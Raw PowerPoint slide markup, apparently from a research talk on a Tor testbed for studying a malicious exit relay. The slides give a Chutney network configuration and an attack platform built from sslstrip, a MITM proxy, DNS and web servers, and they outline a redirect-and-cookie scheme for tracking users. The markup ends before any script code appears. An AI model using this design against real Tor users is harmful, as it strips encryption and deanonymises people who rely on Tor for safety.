            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="100" name="Picture 99" descr="id-47557-logo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1536" y="572987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  <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101" name="Picture 100" descr="serv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9952" y="5717264"/>
              <a:ext cx="1172695" cy="592056"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="102" name="Picture 101" descr="id-47557-logo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1696" y="572987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  <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="103" name="Picture 102" descr="server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0112" y="5717264"/>
              <a:ext cx="1172695" cy="592056"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="104" name="Picture 103" descr="id-47557-logo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21856" y="572987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sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="TextBox 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="4869160"/>
            <a:ext cx="1022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Entry Relay</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="14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5685413" y="3861048"/>
            <a:ext cx="904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Exit Relay</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Left-Right Arrow 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20059351">
            <a:off x="1437108" y="4923560"/>
            <a:ext cx="1346653" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="left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9" name="Left-Right Arrow 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18793886">
            <a:off x="3578450" y="4034522"/>
            <a:ext cx="906717" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="left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0" name="Left-Right Arrow 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148064" y="3356992"/>
            <a:ext cx="576064" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="left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1" name="Left-Right Arrow 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="3429000"/>
            <a:ext cx="1368152" cy="432048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2" name="TextBox 151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796136" y="2996952"/>
            <a:ext cx="62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Eve</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="24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4355976" y="3861048"/>
            <a:ext cx="71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Middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Relay</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Rectangle 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580111" y="3068960"/>
            <a:ext cx="2520281" cy="1152128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120" y="4725144"/>
            <a:ext cx="13805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Attack Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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124744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/>
              <a:t>Goals</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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916832"/>
            <a:ext cx="48245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Eavesdrop on Traffic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Bypass Encryption (HTTPS)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Fingerprint User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Identify User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/>
              <a:t> Privileged Code Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Down Arrow 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084168" y="2132856"/>
            <a:ext cx="1224136" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="10000">
                <a:srgbClr val="C00000"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="9CB86E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="156B13"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="14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64088" y="1628800"/>
            <a:ext cx="932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Easy</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="32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4088" y="4797152"/>
            <a:ext cx="1006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Hard</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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288" y="1484784"/>
            <a:ext cx="12186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Small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Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2800" b="1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92280" y="4581128"/>
            <a:ext cx="12186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Large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Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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Tor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Testbed</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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15816" y="1972848"/>
            <a:ext cx="1172695" cy="592056"/>
            <a:chOff x="2720359" y="1484784"/>
            <a:chExt cx="1172695" cy="592056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3" descr="serv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0359" y="1484784"/>
              <a:ext cx="1172695" cy="592056"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4" descr="id-47557-log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2103" y="149739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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5127497" y="1972848"/>
            <a:ext cx="1172695" cy="592056"/>
            <a:chOff x="2720359" y="1484784"/>
            <a:chExt cx="1172695" cy="592056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 24" descr="serv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0359" y="1484784"/>
              <a:ext cx="1172695" cy="592056"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25" descr="id-47557-log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2103" y="149739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pic>
        <p:nvPicPr>
          <p:cNvPr id="1034" name="Picture 10" descr="http://www.spaceclick.com/it/nav/content/tech/informatics/tutorials/networking-area/media/firewall.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="29686" r="44587" b="8201"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5580112" y="5013176"/>
            <a:ext cx="720080" cy="1412465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1036" name="Picture 12" descr="http://www.gamesparks.com/wp-content/uploads/2013/07/the-clou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5085" t="2384" r="5085" b="18942"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6804248" y="4941168"/>
            <a:ext cx="2160240" cy="1345055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Connector 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1403648" y="3861048"/>
            <a:ext cx="2232248" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -151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0"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="2564904"/>
            <a:ext cx="2232248" cy="1152128"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 232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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3383868" y="2672916"/>
            <a:ext cx="1008112" cy="792088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40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4818886" y="2678059"/>
            <a:ext cx="1008114" cy="781805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99592" y="1340768"/>
            <a:ext cx="1080120" cy="1527266"/>
            <a:chOff x="378146" y="1052736"/>
            <a:chExt cx="1080120" cy="1527266"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="Server-multipl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146" y="1052736"/>
              <a:ext cx="1080120" cy="1527266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="id-47557-log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68" y="119675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pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="desktop-computer-1202766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97"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="5013176"/>
            <a:ext cx="1450861" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Straight Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6051019" y="2037982"/>
            <a:ext cx="1208144" cy="2293973"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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7215729" y="1988840"/>
            <a:ext cx="1172695" cy="592056"/>
            <a:chOff x="2720359" y="1484784"/>
            <a:chExt cx="1172695" cy="592056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Picture 27" descr="server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720359" y="1484784"/>
              <a:ext cx="1172695" cy="592056"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Picture 28" descr="id-47557-logo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062103" y="1497392"/>
              <a:ext cx="432048" cy="43204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</p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67" name="Straight Connector 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4572000" y="3867398"/>
            <a:ext cx="6350" cy="569714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ebobjects2.cdw.com/is/image/CDW/1286966?$product_230$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t="39443" b="37549"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3491880" y="3501008"/>
            <a:ext cx="2190750" cy="504056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70" name="Straight Connector 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4653136"/>
            <a:ext cx="1093862" cy="1038363"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 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routerxc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4293096"/>
            <a:ext cx="2178030" cy="512833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6076060" y="5681644"/>
            <a:ext cx="800196" cy="9856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818655" y="2545159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10.0.0.4</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="14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691680" y="6021288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10.0.0.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1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1403648" y="2564904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10.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="14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3491880" y="2564904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10.0.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="14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5724128" y="2564904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10.0.0.3</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1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4860032" y="4653136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10.0.1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="14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611560" y="119675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AA02A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory Server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699792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Entry Relay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932040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Middle Relay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20272" y="16288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Exit Relay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27584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Client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275856" y="38610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Switch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75856" y="46531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Router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148064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Firewall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92280" y="61653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AA02A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet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35496" y="1686867"/>
            <a:ext cx="9001000" cy="2390205"/>
            <a:chOff x="35496" y="1043444"/>
            <a:chExt cx="9001000" cy="2390205"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="TextBox 96"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="107504" y="1340768"/>
              <a:ext cx="8928992" cy="20928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Authority = Node(tag="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da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authority=1, relay=1,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torrc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authority.tmpl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ip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="10.0.0.1")</a:t>
              </a:r>
            </a:p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Relay1 = Node(tag="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dr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relay=1,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torrc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relay.tmpl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ip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="10.0.0.2")</a:t>
              </a:r>
            </a:p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Relay2 = Node(tag="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dr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relay=1,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torrc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relay.tmpl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ip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="10.0.0.3")</a:t>
              </a:r>
            </a:p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Relay3 = Node(tag="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drx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relay=1,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torrc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relay.tmpl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ip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="10.0.0.4")</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="13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endParaRPr>
            </a:p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Client1 = Node(tag="dc",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torrc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client.tmpl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",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ip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="10.0.0.10")</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="13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endParaRPr>
            </a:p>
            <a:p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NODES = </a:t>
              </a:r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Authority.getN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(1) + Relay1.getN(1) + Relay2.getN(1) + Relay3.getN(1) + Client1.getN(1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="13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endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US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ConfigureNodes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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(NODES)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5496" y="1043444"/>
              <a:ext cx="4032448" cy="3693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255691"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Chutney Script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5496" y="4365104"/>
            <a:ext cx="9001000" cy="989821"/>
            <a:chOff x="35496" y="1043444"/>
            <a:chExt cx="9001000" cy="989821"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="TextBox 100"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="107504" y="1340768"/>
              <a:ext cx="8928992" cy="6924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CA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ExitPolicy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA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 accept *:80</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-CA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ExitPolicy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA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 accept *:443</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-CA" sz="1300" b="1" dirty="0" err="1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ExitPolicy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA" sz="1300" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reject *:*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496" y="1043444"/>
              <a:ext cx="4032448" cy="3693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255691"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Exit Policy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Tor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Testbed</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="DSC_0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052736"/>
            <a:ext cx="3744416" cy="5616624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Attack Platform</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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3779912" y="1386392"/>
            <a:ext cx="15841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Exit Relay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840" y="2924944"/>
            <a:ext cx="1152128" cy="683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sslstrip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592" y="4941168"/>
            <a:ext cx="1157711" cy="683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Bind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DNS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4088" y="1988840"/>
            <a:ext cx="1152128" cy="683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Apache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HTTP Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Preparation 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="3933056"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPreparati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99592" y="40050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libmproxy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Script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31" name="Flowchart: Magnetic Disk 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1844824"/>
            <a:ext cx="864096" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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Traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Log</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Flowchart: Magnetic Disk 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995936" y="1916832"/>
            <a:ext cx="864096" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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3851920" y="2021359"/>
            <a:ext cx="1152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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL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Database</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1700" b="1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51720" y="3140968"/>
            <a:ext cx="1080120" cy="1478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>
            <a:off x="2059536" y="3431768"/>
            <a:ext cx="6760936" cy="861328"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9047"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="5715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99592" y="2924944"/>
            <a:ext cx="1152128" cy="68080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MITM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Proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Curved Connector 37"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4283968" y="2672600"/>
            <a:ext cx="1656184" cy="396360"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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283968" y="3429000"/>
            <a:ext cx="4536504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051720" y="5301208"/>
            <a:ext cx="6768752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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1469877" y="2619917"/>
            <a:ext cx="5779" cy="30502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475656" y="3594138"/>
            <a:ext cx="11312" cy="338918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6520441" y="2141353"/>
            <a:ext cx="577619" cy="8499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6516216" y="2492896"/>
            <a:ext cx="577619" cy="8499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Preparation 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6965356" y="1603162"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPreparati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65356" y="167517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PHP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Code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8" name="Flowchart: Preparation 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948264" y="2348880"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPreparati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48264" y="242088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Javascript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Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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4860032" y="2338975"/>
            <a:ext cx="527168" cy="9905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07504" y="3070438"/>
            <a:ext cx="792088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07504" y="3429000"/>
            <a:ext cx="792088" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="5715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07504" y="5301208"/>
            <a:ext cx="792088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-72008" y="1323676"/>
            <a:ext cx="6835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Tor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201679" y="1403484"/>
            <a:ext cx="1080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10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet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539552" y="1340768"/>
            <a:ext cx="0" cy="4680520"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent6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316416" y="1340768"/>
            <a:ext cx="0" cy="4680520"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent6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788024" y="4005064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24595" y="3483170"/>
            <a:ext cx="7920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88058" y="2666191"/>
            <a:ext cx="6835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67744" y="2843644"/>
            <a:ext cx="6835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860032" y="2771636"/>
            <a:ext cx="6835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012160" y="3131676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HTTP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788024" y="5003884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DNS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7504" y="4859868"/>
            <a:ext cx="8640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55691"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS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292080" y="5771081"/>
            <a:ext cx="288032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Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292080" y="6131121"/>
            <a:ext cx="288032" cy="2880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TextBox 95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580112" y="5732510"/>
            <a:ext cx="114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Encrypted</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D05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80112" y="6079100"/>
            <a:ext cx="146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Unencrypted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292080" y="6491161"/>
            <a:ext cx="288032" cy="2880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TextBox 98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580112" y="6444044"/>
            <a:ext cx="146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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99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771800" y="5771081"/>
            <a:ext cx="504056" cy="2977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01" name="Flowchart: Preparation 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="6131121"/>
            <a:ext cx="504056" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPreparati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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Flowchart: Magnetic Disk 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843808" y="6491161"/>
            <a:ext cx="360040" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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3241672" y="57161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Off-the-shelf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253860" y="607620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AA02A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1AA02A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275856" y="64191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Storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000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2411760" y="1412776"/>
            <a:ext cx="6480720" cy="3600400"/>
            <a:chOff x="2411760" y="1916832"/>
            <a:chExt cx="6480720" cy="3600400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2411760" y="1916832"/>
              <a:ext cx="6480720" cy="360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  <a:effectLst>
              <a:outerShdw blurRad="1905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8370" name="Picture 2" descr="http://iconizer.net/files/Human_o2/orig/gnome-mime-application-xhtml+xm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2276872"/>
              <a:ext cx="1728192" cy="1728193"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Right Arrow 109"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2348880"/>
              <a:ext cx="2160240" cy="432048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2" name="Right Arrow 111"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4499992" y="3212976"/>
              <a:ext cx="2160240" cy="432048"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5395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13" name="Picture 2" descr="http://iconizer.net/files/Human_o2/orig/gnome-mime-application-xhtml+xml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76256" y="2276872"/>
              <a:ext cx="1728192" cy="1728193"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="114" name="TextBox 113"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2843808" y="20515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AA02A"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Requested Page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948264" y="205155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Exit Node Page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355976" y="2368867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/>
                <a:t>Redirect + URL</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA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355976" y="3241509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/>
                <a:t>Redirect + SID</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA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987824" y="4149080"/>
              <a:ext cx="5400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Redirect to our domain with URL parameter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Create new cookie with unique SID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Redirect back to requested page with SID parameter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 smtClean="0"/>
                <a:t>Create cookie on new domain with SID</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA" dirty="0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2411760" y="5229200"/>
            <a:ext cx="648072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b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
